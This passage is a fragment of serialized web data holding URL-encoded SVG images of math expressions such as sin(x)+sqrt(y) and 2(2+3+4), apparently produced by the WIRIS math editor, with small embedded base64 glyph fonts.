zz1AAMIAP%2F%2F%2F%2F%2FVre7u%2F%2F%2F%2F%2F9Wt7u4AAP7QA7cG0AAAAAoAAgABAAAAAAABAAAHPv5OAAAXcAAA%2F%2F4DtwABAAAAAAAAAAAAAAAAAAAAAwDVAAACIAAAAiAAAAAAAAAAAAAkAAAAowAAASQAAQAAAAMACgACAAAAAAACAIAEAAAAAAAEAABNAAAAAAAAABUBAgAAAAAAAAABAD4AAAAAAAAAAAACAA4APgAAAAAAAAADAFwATAAAAAAAAAAEAD4AqAAAAAAAAAAFABYA5gAAAAAAAAAGAB8A%2FAAAAAAAAAAIABwBGwABAAAAAAABAD4AAAABAAAAAAACAA4APgABAAAAAAADAFwATAABAAAAAAAEAD4AqAABAAAAAAAFABYA5gABAAAAAAAGAB8A%2FAABAAAAAAAIABwBGwADAAEECQABAD4AAAADAAEECQACAA4APgADAAEECQADAFwATAADAAEECQAEAD4AqAADAAEECQAFABYA5gADAAEECQAGAB8A%2FAADAAEECQAIABwBGwBSAG8AdQBuAGQAIABiAHIAYQBjAGsAZQB0AHMAIAB3AGkAdABoACAAYQBzAGMAZQBuAHQAIAAxADgANQA0AFIAZQBnAHUAbABhAHIATQBhAHQAaABzACAARgBvAHIAIABNAG8AcgBlACAAUgBvAHUAbgBkACAAYgByAGEAYwBrAGUAdABzACAAdwBpAHQAaAAgAGEAcwBjAGUAbgB0ACAAMQA4ADUANABSAG8AdQBuAGQAIABiAHIAYQBjAGsAZQB0AHMAIAB3AGkAdABoACAAYQBzAGMAZQBuAHQAIAAxADgANQA0AFYAZQByAHMAaQBvAG4AIAAyAC4AMFJvdW5kX2JyYWNrZXRzX3dpdGhfYXNjZW50XzE4NTQATQBhAHQAaABzACAARgBvAHIAIABNAG8AcgBlAAAAAAMAAAAAAAADnwHPAAAAAAAAAAAAAAAAAAAAAAAAAAC5B%2F8AAY2FAA%3D%3D)format('truetype')%3Bfont-weight%3Anormal%3Bfont-style%3Anormal%3B%7D%3C%2Fstyle%3E%3C%2Fdefs%3E%3Ctext%20font-family%3D%22Arial%22%20font-size%3D%2216%22%20text-anchor%3D%22middle%22%20x%3D%2210.5%22%20y%3D%2219%22%3Esin%3C%2Ftext%3E%3Ctext%20font-family%3D%22round_brackets18549f92a457f2409%22%20font-size%3D%2216%22%20text-anchor%3D%22middle%22%20x%3D%2223.5%22%20y%3D%2219%22%3E(%3C%2Ftext%3E%3Ctext%20font-family%3D%22Arial%22%20font-size%3D%2216%22%20font-style%3D%22italic%22%20text-anchor%3D%22middle%22%20x%3D%2229.5%22%20y%3D%2219%22%3Ex%3C%2Ftext%3E%3Ctext%20font-family%3D%22round_brackets18549f92a457f2409%22%20font-size%3D%2216%22%20text-anchor%3D%22middle%22%20x%3D%2236.5%22%20y%3D%2219%22%3E)%3C%2Ftext%3E%3Ctext%20font-family%3D%22math117e62166fc8586dfa4d1bc0e17%22%20font-size%3D%2216%22%20text-anchor%3D%22middle%22%20x%3D%2246.5%22%20y%3D%2219%22%3E%2B%3C%2Ftext%3E%3Cpolyline%20fill%3D%22none%22%20points%3D%2212%2C-16%2011%2C-16%205%2C0%202%2C-6%22%20stroke%3D%22%23000000%22%20stroke-linecap%3D%22square%22%20stroke-width%3D%221%22%20transform%3D%22translate(54.5%2C20.5)%22%2F%3E%3Cpolyline%20fill%3D%22none%22%20points%3D%225%2C0%202%2C-6%200%2C-5%22%20stroke%3D%22%23000000%22%20stroke-linecap%3D%22square%22%20stroke-width%3D%221%22%20transform%3D%22translate(54.5%2C20.5)%22%2F%3E%3Cline%20stroke%3D%22%23000000%22%20stroke-linecap%3D%22square%22%20stroke-width%3D%221%22%20x1%3D%2266.5%22%20x2%3D%2278.5%22%20y1%3D%224.5%22%20y2%3D%224.5%22%2F%3E%3Ctext%20font-family%3D%22Arial%22%20font-size%3D%2216%22%20font-style%3D%22italic%22%20text-anchor%3D%22middle%22%20x%3D%2272.5%22%20y%3D%2219%22%3Ey%3C%2Ftext%3E%3C%2Fsvg%3E", null, 
"data:image/svg+xml;charset=utf8,%3Csvg%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%20xmlns%3Awrs%3D%22http%3A%2F%2Fwww.wiris.com%2Fxml%2Fcvs-extension%22%20height%3D%2223%22%20width%3D%2276%22%20wrs%3Abaseline%3D%2219%22%3E%3C!--MathML%3A%20%3Cmath%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F1998%2FMath%2FMathML%22%3E%3Cmn%3E1%3C%2Fmn%3E%3Cmo%3E.%3C%2Fmo%3E%3Cmn%3E20%3C%2Fmn%3E%3Cmo%3E%26%23xB7%3B%3C%2Fmo%3E%3Cmsup%3E%3Cmn%3E10%3C%2Fmn%3E%3Cmrow%3E%3Cmo%3E-%3C%2Fmo%3E%3Cmn%3E4%3C%2Fmn%3E%3C%2Fmrow%3E%3C%2Fmsup%3E%3C%2Fmath%3E--%3E%3Cdefs%3E%3Cstyle%20type%3D%22text%2Fcss%22%3E%40font-face%7Bfont-family%3A'math1bd801cec7580383152bae376ff'%3Bsrc%3Aurl(data%3Afont%2Ftruetype%3Bcharset%3Dutf-8%3Bbase64%2CAAEAAAAMAIAAAwBAT1MvMi7iBBMAAADMAAAATmNtYXDEvmKUAAABHAAAAERjdnQgDVUNBwAAAWAAAAA6Z2x5ZoPi2VsAAAGcAAAA62hlYWQQC2qxAAACiAAAADZoaGVhCGsXSAAAAsAAAAAkaG10eE2rRkcAAALkAAAAEGxvY2EAHTwYAAAC9AAAABRtYXhwBT0FPgAAAwgAAAAgbmFtZaBxlY4AAAMoAAABn3Bvc3QB9wD6AAAEyAAAACBwcmVwa1uragAABOgAAAAUAAADSwGQAAUAAAQABAAAAAAABAAEAAAAAAAAAQEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAgICAAAAAg1UADev96AAAD6ACWAAAAAAACAAEAAQAAABQAAwABAAAAFAAEADAAAAAIAAgAAgAAAC4AtyIS%2F%2F8AAAAuALciEv%2F%2F%2F9P%2FS93xAAEAAAAAAAAAAAAAAVQDLACAAQAAVgAqAlgCHgEOASwCLABaAYACgACgANQAgAAAAAAAAAArAFUAgACrANUBAAErAAcAAAACAFUAAAMAA6sAAwAHAAAzESERJSERIVUCq%2F2rAgD%2BAAOr%2FFVVAwAAAQAgAAAAoACAAAMALxgBsAQQsAPUsAMQsALUsAMQsAA8sAIQsAE8ALAEELAD1LADELACPLAAELABPDAxNzMVIyCAgICAAAEAgAFVAOsBwAADABsYAbAEELEAA%2FSxAgP0sQUD9ACwBBCxAwb0MDETMxUjgGtrAcBrAAEAgAFVAtUBqwADADAYAbAEELEAA%2FawAzyxAgf1sAE8sQUD5gCxAAATELEABuWxAAETELABPLEDBfWwAjwTIRUhgAJV%2FasBq1YAAAEAAAABAADVeM5BXw889QADBAD%2F%2F%2F%2F%2F1joTc%2F%2F%2F%2F%2F%2FWOhNzAAD%2FIASAA6sAAAAKAAIAAQAAAAAAAQAAA%2Bj%2FagAAF3AAAP%2B2BIAAAQAAAAAAAAAAAAAAAAAAAAQDUgBVAMgAIAFrAIADVgCAAAAAAAAAACgAAABuAAAAoQAAAOsAAQAAAAQAXgAFAAAAAAACAIAEAAAAAAAEAADeAAAAAAAAABUBAgAAAAAAAAABABIAAAAAAAAAAAACAA4AEgAAAAAAAAADADAAIAAAAAAAAAAEABIAUAAAAAAAAAAFABYAYgAAAAAAAAAGAAkAeAAAAAAAAAAIABwAgQABAAAAAAABABIAAAABAAAAAAACAA4AEgABAAAAAAADADAAIAABAAAAAAAEABIAUAABAAAAAAAFABYAYgABAAAAAAAGAAkAeAABAAAAAAAIABwAgQADAAEECQABABIAAAADAAEECQACAA4AEgADAAEECQADADAAIAADAAEECQAEABIAUAADAAEECQAFABYAYgADAAEECQAGAAkAeAADAAEECQAIABwAgQBNAGEAdABoACAARgBvAG4AdABSAGUAZwB1AGwAYQByAE0AYQB0AGgAcwAgAEYAbwByACAATQBvAHIAZQAgAE0AYQB0AGgAIABGAG8AbgB0AE0AYQB0AGgAIABGAG8AbgB0AFYAZQByAHMAaQBvAG4AIAAxAC4AME1hdGhfRm9udABNAGEAdABoAHMAIABGAG8AcgAgAE0AbwByAGUAAAMAAAAAAAAB9AD6AAAAAAAAAAAAAAAAAAAAAAAAAAC5BxEAAI2FGACyAAAAFRQTsQABPw%3D%3D)format('truetype')%3Bfont-weight%3Anormal%3Bfont-style%3Anormal%3B%7D%3C%2Fstyle%3E%3C%2Fdefs%3E%3Ctext%20font-family%3D%22Arial%22%20font-size%3D%2216%22%20text-anchor%3D%22middle%22%20x%3D%224.5%22%20y%3D%2219%22%3E1%3C%2Ftext%3E%3Ctext%20font-family%3D%22math1bd801cec7580383152bae376ff%22%20font-size%3D%2216%22%20text-anchor%3D%22middle%22%20x%3D%2211.5%22%20y%3D%2219%22%3E.%3C%2Ftext%3E%3Ctext%20font-family%3D%22Arial%22%20font-size%3D%2216%22%20text-anchor%3D%22middle%22%20x%3D%2223.5%22%20y%3D%2219%22%3E20%3C%2Ftext%3E%3Ctext%20font-family%3D%22math1bd801cec7580383152bae376ff%22%20font-size%3D%2216%22%20text-anchor%3D%22middle%22%20x%3D%2236.5%22%20y%3D%2219%22%3E%26%23xB7%3B%3C%2Ftext%3E%3Ctext%20font-family%3D%22Arial%22%20font-size%3D%2216%22%20text-anchor%3D%22middle%22%20x%3D%2249.5%22%20y%3D%2219%22%3E10%3C%2Ftext%3E%3Ctext%20font-family%3D%22math1bd801cec7580383152bae376ff%22%20font-size%3D%2212%22%20text-anchor%3D%22middle%22%20x%3D%2263.5%22%20y%3D%2212%22%3E%26%23x2212%3B%3C%2Ftext%3E%3Ctext%20font-family%3D%22Arial%22%20font-size%3D%2212%22%20t
ext-anchor%3D%22middle%22%20x%3D%2271.5%22%20y%3D%2212%22%3E4%3C%2Ftext%3E%3C%2Fsvg%3E", null, "data:image/svg+xml;charset=utf8,%3Csvg%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%20xmlns%3Awrs%3D%22http%3A%2F%2Fwww.wiris.com%2Fxml%2Fcvs-extension%22%20height%3D%2225%22%20width%3D%2243%22%20wrs%3Abaseline%3D%2221%22%3E%3C!--MathML%3A%20%3Cmath%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F1998%2FMath%2FMathML%22%3E%3Cmsup%3E%3Cmfenced%3E%3Cmsqrt%3E%3Cmi%3Ex%3C%2Fmi%3E%3C%2Fmsqrt%3E%3C%2Fmfenced%3E%3Cmn%3E3%3C%2Fmn%3E%3C%2Fmsup%3E%3C%2Fmath%3E--%3E%3Cdefs%3E%3Cstyle%20type%3D%22text%2Fcss%22%3E%40font-face%7Bfont-family%3A'round_brackets18549f92a457f2409'%3Bsrc%3Aurl(data%3Afont%2Ftruetype%3Bcharset%3Dutf-8%3Bbase64%2CAAEAAAAMAIAAAwBAT1MvMjwHLFQAAADMAAAATmNtYXDf7xCrAAABHAAAADxjdnQgBAkDLgAAAVgAAAASZ2x5ZmAOz2cAAAFsAAABJGhlYWQOKih8AAACkAAAADZoaGVhCvgVwgAAAsgAAAAkaG10eCA6AAIAAALsAAAADGxvY2EAAARLAAAC%2BAAAABBtYXhwBIgEWQAAAwgAAAAgbmFtZXHR30MAAAMoAAACOXBvc3QDogHPAAAFZAAAACBwcmVwupWEAAAABYQAAAAHAAAGcgGQAAUAAAgACAAAAAAACAAIAAAAAAAAAQIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAgICAAAAAo8AMGe%2F57AAAHPgGyAAAAAAACAAEAAQAAABQAAwABAAAAFAAEACgAAAAGAAQAAQACACgAKf%2F%2FAAAAKAAp%2F%2F%2F%2F2f%2FZAAEAAAAAAAAAAAFUAFYBAAAsAKgDgAAyAAcAAAACAAAAKgDVA1UAAwAHAAA1MxEjEyMRM9XVq4CAKgMr%2FQAC1QABAAD%2B0AIgBtAACQBNGAGwChCwA9SwAxCwAtSwChCwBdSwBRCwANSwAxCwBzywAhCwCDwAsAoQsAPUsAMQsAfUsAoQsAXUsAoQsADUsAMQsAI8sAcQsAg8MTAREAEzABEQASMAAZCQ%2FnABkJD%2BcALQ%2FZD%2BcAGQAnACcAGQ%2FnAAAQAA%2FtACIAbQAAkATRgBsAoQsAPUsAMQsALUsAoQsAXUsAUQsADUsAMQsAc8sAIQsAg8ALAKELAD1LADELAH1LAKELAF1LAKELAA1LADELACPLAHELAIPDEwARABIwAREAEzAAIg%2FnCQAZD%2BcJABkALQ%2FZD%2BcAGQAnACcAGQ%2FnAAAQAAAAEAAPW2NYFfDzz1AAMIAP%2F%2F%2F%2F%2FVre7u%2F%2F%2F%2F%2F9Wt7u4AAP7QA7cG0AAAAAoAAgABAAAAAAABAAAHPv5OAAAXcAAA%2F%2F4DtwABAAAAAAAAAAAAAAAAAAAAAwDVAAACIAAAAiAAAAAAAAAAAAAkAAAAowAAASQAAQAAAAMACgACAAAAAAACAIAEAAAAAAAEAABNAAAAAAAAABUBAgAAAAAAAAABAD4AAAAAAAAAAAACAA4APgAAAAAAAAADAFwATAAAAAAAAAAEAD4AqAAAAAAAAAAFABYA5gAAAAAAAAAGAB8A%2FAAAAAAAAAAIABwBGwABAAAAAAABAD4AAAABAAAAAAACAA4APgABAAAAAAADAFwATAABAAAAAAAEAD4AqAABAAAAAAAFABYA5gABAAAAAAAGAB8A%2FAABAAAAAAAIABwBGwADAAEECQABAD4AAAADAAEECQACAA4APgADAAEECQADAFwATAADAAEECQAEAD4AqAADAAEECQAFABYA5gADAAEECQAGAB8A%2FAADAAEECQAIABwBGwBSAG8AdQBuAGQAIABiAHIAYQBjAGsAZQB0AHMAIAB3AGkAdABoACAAYQBzAGMAZQBuAHQAIAAxADgANQA0AFIAZQBnAHUAbABhAHIATQBhAHQAaABzACAARgBvAHIAIABNAG8AcgBlACAAUgBvAHUAbgBkACAAYgByAGEAYwBrAGUAdABzACAAdwBpAHQAaAAgAGEAcwBjAGUAbgB0ACAAMQA4ADUANABSAG8AdQBuAGQAIABiAHIAYQBjAGsAZQB0AHMAIAB3AGkAdABoACAAYQBzAGMAZQBuAHQAIAAxADgANQA0AFYAZQByAHMAaQBvAG4AIAAyAC4AMFJvdW5kX2JyYWNrZXRzX3dpdGhfYXNjZW50XzE4NTQATQBhAHQAaABzACAARgBvAHIAIABNAG8AcgBlAAAAAAMAAAAAAAADnwHPAAAAAAAAAAAAAAAAAAAAAAAAAAC5B%2F8AAY2FAA%3D%3D)format('truetype')%3Bfont-weight%3Anormal%3Bfont-style%3Anormal%3B%7D%3C%2Fstyle%3E%3C%2Fdefs%3E%3Ctext%20font-family%3D%22round_brackets18549f92a457f2409%22%20font-size%3D%2216%22%20text-anchor%3D%22middle%22%20x%3D%223.5%22%20y%3D%2221%22%3E(%3C%2Ftext%3E%3Ctext%20font-family%3D%22round_brackets18549f92a457f2409%22%20font-size%3D%2216%22%20text-anchor%3D%22middle%22%20x%3D%2232.5%22%20y%3D%2221%22%3E)%3C%2Ftext%3E%3Cpolyline%20fill%3D%22none%22%20points%3D%2212%2C-16%2011%2C-16%205%2C0%202%2C-6%22%20stroke%3D%22%23000000%22%20stroke-linecap%3D%22square%22%20stroke-width%3D%221%22%20transform%3D%22translate(5.5%2C22.5)%22%2F%3E%3Cpolyline%20fill%3D%22none%22%20points%3D%225%2C0%202%2C-6%200%2C-5%22%20stroke%3D%22%23000000%22%20stroke-linecap%3D%22square%22%20stroke-width%3D%221%22%20transform%3D%22translate(5.5%2C22.5)%22%2F%3E%3Cline%20
stroke%3D%22%23000000%22%20stroke-linecap%3D%22square%22%20stroke-width%3D%221%22%20x1%3D%2217.5%22%20x2%3D%2229.5%22%20y1%3D%226.5%22%20y2%3D%226.5%22%2F%3E%3Ctext%20font-family%3D%22Arial%22%20font-size%3D%2216%22%20font-style%3D%22italic%22%20text-anchor%3D%22middle%22%20x%3D%2223.5%22%20y%3D%2221%22%3Ex%3C%2Ftext%3E%3Ctext%20font-family%3D%22Arial%22%20font-size%3D%2212%22%20text-anchor%3D%22middle%22%20x%3D%2238.5%22%20y%3D%2211%22%3E3%3C%2Ftext%3E%3C%2Fsvg%3E", null, "data:image/svg+xml;charset=utf8,%3Csvg%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%20xmlns%3Awrs%3D%22http%3A%2F%2Fwww.wiris.com%2Fxml%2Fcvs-extension%22%20height%3D%2219%22%20width%3D%2219%22%20wrs%3Abaseline%3D%2215%22%3E%3C!--MathML%3A%20%3Cmath%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F1998%2FMath%2FMathML%22%3E%3Cmn%3E27%3C%2Fmn%3E%3C%2Fmath%3E--%3E%3Cdefs%3E%3Cstyle%20type%3D%22text%2Fcss%22%2F%3E%3C%2Fdefs%3E%3Ctext%20font-family%3D%22Arial%22%20font-size%3D%2216%22%20text-anchor%3D%22middle%22%20x%3D%229.5%22%20y%3D%2215%22%3E27%3C%2Ftext%3E%3C%2Fsvg%3E", null, "data:image/svg+xml;charset=utf8,%3Csvg%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%20xmlns%3Awrs%3D%22http%3A%2F%2Fwww.wiris.com%2Fxml%2Fcvs-extension%22%20height%3D%2222%22%20width%3D%2234%22%20wrs%3Abaseline%3D%2218%22%3E%3C!--MathML%3A%20%3Cmath%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F1998%2FMath%2FMathML%22%3E%3Cmsup%3E%3Cmn%3E2%3C%2Fmn%3E%3Cmn%3E4%3C%2Fmn%3E%3C%2Fmsup%3E%3Cmo%3E%26%23xB7%3B%3C%2Fmo%3E%3Cmn%3E3%3C%2Fmn%3E%3C%2Fmath%3E--%3E%3Cdefs%3E%3Cstyle%20type%3D%22text%2Fcss%22%3E%40font-face%7Bfont-family%3A'math1cedebb6e872f539bef8c3f9198'%3Bsrc%3Aurl(data%3Afont%2Ftruetype%3Bcharset%3Dutf-8%3Bbase64%2CAAEAAAAMAIAAAwBAT1MvMi7iBBMAAADMAAAATmNtYXDEvmKUAAABHAAAADRjdnQgDVUNBwAAAVAAAAA6Z2x5ZoPi2VsAAAGMAAAAW2hlYWQQC2qxAAAB6AAAADZoaGVhCGsXSAAAAiAAAAAkaG10eE2rRkcAAAJEAAAACGxvY2EAHTwYAAACTAAAAAxtYXhwBT0FPgAAAlgAAAAgbmFtZaBxlY4AAAJ4AAABn3Bvc3QB9wD6AAAEGAAAACBwcmVwa1uragAABDgAAAAUAAADSwGQAAUAAAQABAAAAAAABAAEAAAAAAAAAQEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAgICAAAAAg1UADev96AAAD6ACWAAAAAAACAAEAAQAAABQAAwABAAAAFAAEACAAAAAEAAQAAQAAALf%2F%2FwAAALf%2F%2F%2F9KAAEAAAAAAAABVAMsAIABAABWACoCWAIeAQ4BLAIsAFoBgAKAAKAA1ACAAAAAAAAAACsAVQCAAKsA1QEAASsABwAAAAIAVQAAAwADqwADAAcAADMRIRElIREhVQKr%2FasCAP4AA6v8VVUDAAABAIABVQDrAcAAAwAbGAGwBBCxAAP0sQID9LEFA%2FQAsAQQsQMG9DAxEzMVI4BrawHAawAAAQAAAAEAANV4zkFfDzz1AAMEAP%2F%2F%2F%2F%2FWOhNz%2F%2F%2F%2F%2F9Y6E3MAAP8gBIADqwAAAAoAAgABAAAAAAABAAAD6P9qAAAXcAAA%2F7YEgAABAAAAAAAAAAAAAAAAAAAAAgNSAFUBawCAAAAAAAAAACgAAABbAAEAAAACAF4ABQAAAAAAAgCABAAAAAAABAAA3gAAAAAAAAAVAQIAAAAAAAAAAQASAAAAAAAAAAAAAgAOABIAAAAAAAAAAwAwACAAAAAAAAAABAASAFAAAAAAAAAABQAWAGIAAAAAAAAABgAJAHgAAAAAAAAACAAcAIEAAQAAAAAAAQASAAAAAQAAAAAAAgAOABIAAQAAAAAAAwAwACAAAQAAAAAABAASAFAAAQAAAAAABQAWAGIAAQAAAAAABgAJAHgAAQAAAAAACAAcAIEAAwABBAkAAQASAAAAAwABBAkAAgAOABIAAwABBAkAAwAwACAAAwABBAkABAASAFAAAwABBAkABQAWAGIAAwABBAkABgAJAHgAAwABBAkACAAcAIEATQBhAHQAaAAgAEYAbwBuAHQAUgBlAGcAdQBsAGEAcgBNAGEAdABoAHMAIABGAG8AcgAgAE0AbwByAGUAIABNAGEAdABoACAARgBvAG4AdABNAGEAdABoACAARgBvAG4AdABWAGUAcgBzAGkAbwBuACAAMQAuADBNYXRoX0ZvbnQATQBhAHQAaABzACAARgBvAHIAIABNAG8AcgBlAAADAAAAAAAAAfQA%2BgAAAAAAAAAAAAAAAAAAAAAAAAAAuQcRAACNhRgAsgAAABUUE7EAAT8%3D)format('truetype')%3Bfont-weight%3Anormal%3Bfont-style%3Anormal%3B%7D%3C%2Fstyle%3E%3C%2Fdefs%3E%3Ctext%20font-family%3D%22Arial%22%20font-size%3D%2216%22%20text-anchor%3D%22middle%22%20x%3D%224.5%22%20y%3D%2218%22%3E2%3C%2Ftext%3E%3Ctext%20font-family%3D%22Arial%22%20font-size%3D%2212%22%20text-anchor%3D%22middle%22%20x%3D%2212.5%22%20y%3D%2211%22%3E4%
3C%2Ftext%3E%3Ctext%20font-family%3D%22math1cedebb6e872f539bef8c3f9198%22%20font-size%3D%2216%22%20text-anchor%3D%22middle%22%20x%3D%2220.5%22%20y%3D%2218%22%3E%26%23xB7%3B%3C%2Ftext%3E%3Ctext%20font-family%3D%22Arial%22%20font-size%3D%2216%22%20text-anchor%3D%22middle%22%20x%3D%2228.5%22%20y%3D%2218%22%3E3%3C%2Ftext%3E%3C%2Fsvg%3E", null, "data:image/svg+xml;charset=utf8,%3Csvg%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%20xmlns%3Awrs%3D%22http%3A%2F%2Fwww.wiris.com%2Fxml%2Fcvs-extension%22%20height%3D%2245%22%20width%3D%2234%22%20wrs%3Abaseline%3D%2230%22%3E%3C!--MathML%3A%20%3Cmath%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F1998%2FMath%2FMathML%22%3E%3Cmfrac%3E%3Cmsqrt%3E%3Cmn%3E2%3C%2Fmn%3E%3C%2Fmsqrt%3E%3Cmn%3E2%3C%2Fmn%3E%3C%2Fmfrac%3E%3C%2Fmath%3E--%3E%3Cdefs%3E%3Cstyle%20type%3D%22text%2Fcss%22%2F%3E%3C%2Fdefs%3E%3Cline%20stroke%3D%22%23000000%22%20stroke-linecap%3D%22square%22%20stroke-width%3D%221%22%20x1%3D%222.5%22%20x2%3D%2230.5%22%20y1%3D%2224.5%22%20y2%3D%2224.5%22%2F%3E%3Cpolyline%20fill%3D%22none%22%20points%3D%2212%2C-16%2011%2C-16%205%2C0%202%2C-6%22%20stroke%3D%22%23000000%22%20stroke-linecap%3D%22square%22%20stroke-width%3D%221%22%20transform%3D%22translate(4.5%2C20.5)%22%2F%3E%3Cpolyline%20fill%3D%22none%22%20points%3D%225%2C0%202%2C-6%200%2C-5%22%20stroke%3D%22%23000000%22%20stroke-linecap%3D%22square%22%20stroke-width%3D%221%22%20transform%3D%22translate(4.5%2C20.5)%22%2F%3E%3Cline%20stroke%3D%22%23000000%22%20stroke-linecap%3D%22square%22%20stroke-width%3D%221%22%20x1%3D%2216.5%22%20x2%3D%2228.5%22%20y1%3D%224.5%22%20y2%3D%224.5%22%2F%3E%3Ctext%20font-family%3D%22Arial%22%20font-size%3D%2216%22%20text-anchor%3D%22middle%22%20x%3D%2222.5%22%20y%3D%2219%22%3E2%3C%2Ftext%3E%3Ctext%20font-family%3D%22Arial%22%20font-size%3D%2216%22%20text-anchor%3D%22middle%22%20x%3D%2216.5%22%20y%3D%2241%22%3E2%3C%2Ftext%3E%3C%2Fsvg%3E", null, 
"data:image/svg+xml;charset=utf8,%3Csvg%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%20xmlns%3Awrs%3D%22http%3A%2F%2Fwww.wiris.com%2Fxml%2Fcvs-extension%22%20height%3D%2221%22%20width%3D%2277%22%20wrs%3Abaseline%3D%2216%22%3E%3C!--MathML%3A%20%3Cmath%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F1998%2FMath%2FMathML%22%3E%3Cmn%3E2%3C%2Fmn%3E%3Cmo%3E(%3C%2Fmo%3E%3Cmn%3E2%3C%2Fmn%3E%3Cmo%3E%2B%3C%2Fmo%3E%3Cmn%3E3%3C%2Fmn%3E%3Cmo%3E%2B%3C%2Fmo%3E%3Cmn%3E4%3C%2Fmn%3E%3Cmo%3E)%3C%2Fmo%3E%3C%2Fmath%3E--%3E%3Cdefs%3E%3Cstyle%20type%3D%22text%2Fcss%22%3E%40font-face%7Bfont-family%3A'math117e62166fc8586dfa4d1bc0e17'%3Bsrc%3Aurl(data%3Afont%2Ftruetype%3Bcharset%3Dutf-8%3Bbase64%2CAAEAAAAMAIAAAwBAT1MvMi7iBBMAAADMAAAATmNtYXDEvmKUAAABHAAAADRjdnQgDVUNBwAAAVAAAAA6Z2x5ZoPi2VsAAAGMAAAAoWhlYWQQC2qxAAACMAAAADZoaGVhCGsXSAAAAmgAAAAkaG10eE2rRkcAAAKMAAAACGxvY2EAHTwYAAAClAAAAAxtYXhwBT0FPgAAAqAAAAAgbmFtZaBxlY4AAALAAAABn3Bvc3QB9wD6AAAEYAAAACBwcmVwa1uragAABIAAAAAUAAADSwGQAAUAAAQABAAAAAAABAAEAAAAAAAAAQEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAgICAAAAAg1UADev96AAAD6ACWAAAAAAACAAEAAQAAABQAAwABAAAAFAAEACAAAAAEAAQAAQAAACv%2F%2FwAAACv%2F%2F%2F%2FWAAEAAAAAAAABVAMsAIABAABWACoCWAIeAQ4BLAIsAFoBgAKAAKAA1ACAAAAAAAAAACsAVQCAAKsA1QEAASsABwAAAAIAVQAAAwADqwADAAcAADMRIRElIREhVQKr%2FasCAP4AA6v8VVUDAAABAIAAVQLVAqsACwBJARiyDAEBFBMQsQAD9rEBBPWwCjyxAwX1sAg8sQUE9bAGPLENA%2BYAsQAAExCxAQbksQEBExCwBTyxAwTlsQsF9bAHPLEJBOUxMBMhETMRIRUhESMRIYABAFUBAP8AVf8AAasBAP8AVv8AAQAAAAAAAQAAAAEAANV4zkFfDzz1AAMEAP%2F%2F%2F%2F%2FWOhNz%2F%2F%2F%2F%2F9Y6E3MAAP8gBIADqwAAAAoAAgABAAAAAAABAAAD6P9qAAAXcAAA%2F7YEgAABAAAAAAAAAAAAAAAAAAAAAgNSAFUDVgCAAAAAAAAAACgAAAChAAEAAAACAF4ABQAAAAAAAgCABAAAAAAABAAA3gAAAAAAAAAVAQIAAAAAAAAAAQASAAAAAAAAAAAAAgAOABIAAAAAAAAAAwAwACAAAAAAAAAABAASAFAAAAAAAAAABQAWAGIAAAAAAAAABgAJAHgAAAAAAAAACAAcAIEAAQAAAAAAAQASAAAAAQAAAAAAAgAOABIAAQAAAAAAAwAwACAAAQAAAAAABAASAFAAAQAAAAAABQAWAGIAAQAAAAAABgAJAHgAAQAAAAAACAAcAIEAAwABBAkAAQASAAAAAwABBAkAAgAOABIAAwABBAkAAwAwACAAAwABBAkABAASAFAAAwABBAkABQAWAGIAAwABBAkABgAJAHgAAwABBAkACAAcAIEATQBhAHQAaAAgAEYAbwBuAHQAUgBlAGcAdQBsAGEAcgBNAGEAdABoAHMAIABGAG8AcgAgAE0AbwByAGUAIABNAGEAdABoACAARgBvAG4AdABNAGEAdABoACAARgBvAG4AdABWAGUAcgBzAGkAbwBuACAAMQAuADBNYXRoX0ZvbnQATQBhAHQAaABzACAARgBvAHIAIABNAG8AcgBlAAADAAAAAAAAAfQA%2BgAAAAAAAAAAAAAAAAAAAAAAAAAAuQcRAACNhRgAsgAAABUUE7EAAT8%3D)format('truetype')%3Bfont-weight%3Anormal%3Bfont-style%3Anormal%3B%7D%40font-face%7Bfont-family%3A'round_brackets18549f92a457f2409'%3Bsrc%3Aurl(data%3Afont%2Ftruetype%3Bcharset%3Dutf-8%3Bbase64%2CAAEAAAAMAIAAAwBAT1MvMjwHLFQAAADMAAAATmNtYXDf7xCrAAABHAAAADxjdnQgBAkDLgAAAVgAAAASZ2x5ZmAOz2cAAAFsAAABJGhlYWQOKih8AAACkAAAADZoaGVhCvgVwgAAAsgAAAAkaG10eCA6AAIAAALsAAAADGxvY2EAAARLAAAC%2BAAAABBtYXhwBIgEWQAAAwgAAAAgbmFtZXHR30MAAAMoAAACOXBvc3QDogHPAAAFZAAAACBwcmVwupWEAAAABYQAAAAHAAAGcgGQAAUAAAgACAAAAAAACAAIAAAAAAAAAQIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAgICAAAAAo8AMGe%2F57AAAHPgGyAAAAAAACAAEAAQAAABQAAwABAAAAFAAEACgAAAAGAAQAAQACACgAKf%2F%2FAAAAKAAp%2F%2F%2F%2F2f%2FZAAEAAAAAAAAAAAFUAFYBAAAsAKgDgAAyAAcAAAACAAAAKgDVA1UAAwAHAAA1MxEjEyMRM9XVq4CAKgMr%2FQAC1QABAAD%2B0AIgBtAACQBNGAGwChCwA9SwAxCwAtSwChCwBdSwBRCwANSwAxCwBzywAhCwCDwAsAoQsAPUsAMQsAfUsAoQsAXUsAoQsADUsAMQsAI8sAcQsAg8MTAREAEzABEQASMAAZCQ%2FnABkJD%2BcALQ%2FZD%2BcAGQAnACcAGQ%2FnAAAQAA%2FtACIAbQAAkATRgBsAoQsAPUsAMQsALUsAoQsAXUsAUQsADUsAMQsAc8